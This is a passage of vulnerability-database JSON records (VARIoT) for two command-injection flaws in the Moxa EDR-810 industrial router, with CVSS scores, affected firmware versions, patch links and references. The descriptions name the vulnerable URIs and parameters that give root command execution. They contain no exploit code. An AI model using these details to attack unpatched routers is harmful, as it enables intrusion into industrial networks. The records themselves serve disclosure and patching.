}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0947",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.2"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.2 build 18041013"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "4.218041013"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-21940"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-009796"
},
{
"db": "NVD",
"id": "CVE-2018-16282"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-941"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16282"
}
]
},
"cve": "CVE-2018-16282",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-16282",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-21940",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-126626",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-16282",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-16282",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-21940",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-941",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-126626",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-21940"
},
{
"db": "VULHUB",
"id": "VHN-126626"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-009796"
},
{
"db": "NVD",
"id": "CVE-2018-16282"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-941"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A command injection vulnerability in the web server functionality of Moxa EDR-810 V4.2 build 18041013 allows remote attackers to execute arbitrary OS commands with root privilege via the caname parameter to the /xml/net_WebCADELETEGetValue URI. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The MoxaEDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and hosted Layer 2 switch capabilities. There is a command injection vulnerability in the web server function of MoxaEDR-8104.2build18041013. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16282"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-009796"
},
{
"db": "CNVD",
"id": "CNVD-2018-21940"
},
{
"db": "VULHUB",
"id": "VHN-126626"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-16282",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-009796",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201809-941",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-21940",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-126626",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-21940"
},
{
"db": "VULHUB",
"id": "VHN-126626"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-009796"
},
{
"db": "NVD",
"id": "CVE-2018-16282"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-941"
}
]
},
"id": "VAR-201809-0947",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-21940"
},
{
"db": "VULHUB",
"id": "VHN-126626"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-21940"
}
]
},
"last_update_date": "2023-12-18T12:36:33.343000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Firmware for EDR-810 series",
"trust": 0.8,
"url": "https://www.moxa.com/support/download.aspx?type=support\u0026id=15851"
},
{
"title": "MoxaEDR-810 command injection vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/143399"
},
{
"title": "Moxa EDR-810 Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=85057"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-21940"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-009796"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-941"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-126626"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-009796"
},
{
"db": "NVD",
"id": "CVE-2018-16282"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://gist.github.com/tim124058/5c4babe391a016c771d2cccabead21cb"
},
{
"trust": 1.6,
"url": "https://www.moxa.com/support/download.aspx?type=support\u0026id=15851"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16282"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16282"
},
{
"trust": 0.1,
"url": "https://www.moxa.com/support/download.aspx?type=support\u0026amp;id=15851"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-21940"
},
{
"db": "VULHUB",
"id": "VHN-126626"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-009796"
},
{
"db": "NVD",
"id": "CVE-2018-16282"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-941"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-21940"
},
{
"db": "VULHUB",
"id": "VHN-126626"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-009796"
},
{
"db": "NVD",
"id": "CVE-2018-16282"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-941"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-21940"
},
{
"date": "2018-09-20T00:00:00",
"db": "VULHUB",
"id": "VHN-126626"
},
{
"date": "2018-11-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-009796"
},
{
"date": "2018-09-20T20:29:00.643000",
"db": "NVD",
"id": "CVE-2018-16282"
},
{
"date": "2018-09-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-941"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-21940"
},
{
"date": "2018-11-05T00:00:00",
"db": "VULHUB",
"id": "VHN-126626"
},
{
"date": "2018-11-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-009796"
},
{
"date": "2018-11-05T21:28:54.710000",
"db": "NVD",
"id": "CVE-2018-16282"
},
{
"date": "2018-09-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-941"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-941"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 Command Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-21940"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-941"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-941"
}
],
"trust": 0.6
}
}
VAR-201805-0137
Vulnerability from variot - Updated: 2023-12-18 12:28An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the openvpnServer0_tmp= parameter in the "/goform/net_Web_get_value" uri to trigger this vulnerability. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0137",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11724"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013412"
},
{
"db": "NVD",
"id": "CVE-2017-14432"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-813"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14432"
}
]
},
"cve": "CVE-2017-14432",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-14432",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2018-11724",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-105154",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14432",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14432",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-14432",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11724",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-813",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105154",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-14432",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11724"
},
{
"db": "VULHUB",
"id": "VHN-105154"
},
{
"db": "VULMON",
"id": "CVE-2017-14432"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013412"
},
{
"db": "NVD",
"id": "CVE-2017-14432"
},
{
"db": "NVD",
"id": "CVE-2017-14432"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-813"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the openvpnServer0_tmp= parameter in the \"/goform/net\\_Web\\_get_value\" uri to trigger this vulnerability. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14432"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013412"
},
{
"db": "CNVD",
"id": "CNVD-2018-11724"
},
{
"db": "VULHUB",
"id": "VHN-105154"
},
{
"db": "VULMON",
"id": "CVE-2017-14432"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14432",
"trust": 3.2
},
{
"db": "TALOS",
"id": "TALOS-2017-0482",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013412",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-813",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11724",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105154",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-14432",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11724"
},
{
"db": "VULHUB",
"id": "VHN-105154"
},
{
"db": "VULMON",
"id": "CVE-2017-14432"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013412"
},
{
"db": "NVD",
"id": "CVE-2017-14432"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-813"
}
]
},
"id": "VAR-201805-0137",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11724"
},
{
"db": "VULHUB",
"id": "VHN-105154"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11724"
}
]
},
"last_update_date": "2023-12-18T12:28:57.494000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for MoxaEDR-810 Command Injection Vulnerability (CNVD-2018-11724)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132239"
},
{
"title": "Moxa EDR-810 Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190044"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11724"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013412"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-813"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105154"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013412"
},
{
"db": "NVD",
"id": "CVE-2017-14432"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0482"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14432"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14432"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0482"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11724"
},
{
"db": "VULHUB",
"id": "VHN-105154"
},
{
"db": "VULMON",
"id": "CVE-2017-14432"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013412"
},
{
"db": "NVD",
"id": "CVE-2017-14432"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-813"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11724"
},
{
"db": "VULHUB",
"id": "VHN-105154"
},
{
"db": "VULMON",
"id": "CVE-2017-14432"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013412"
},
{
"db": "NVD",
"id": "CVE-2017-14432"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-813"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
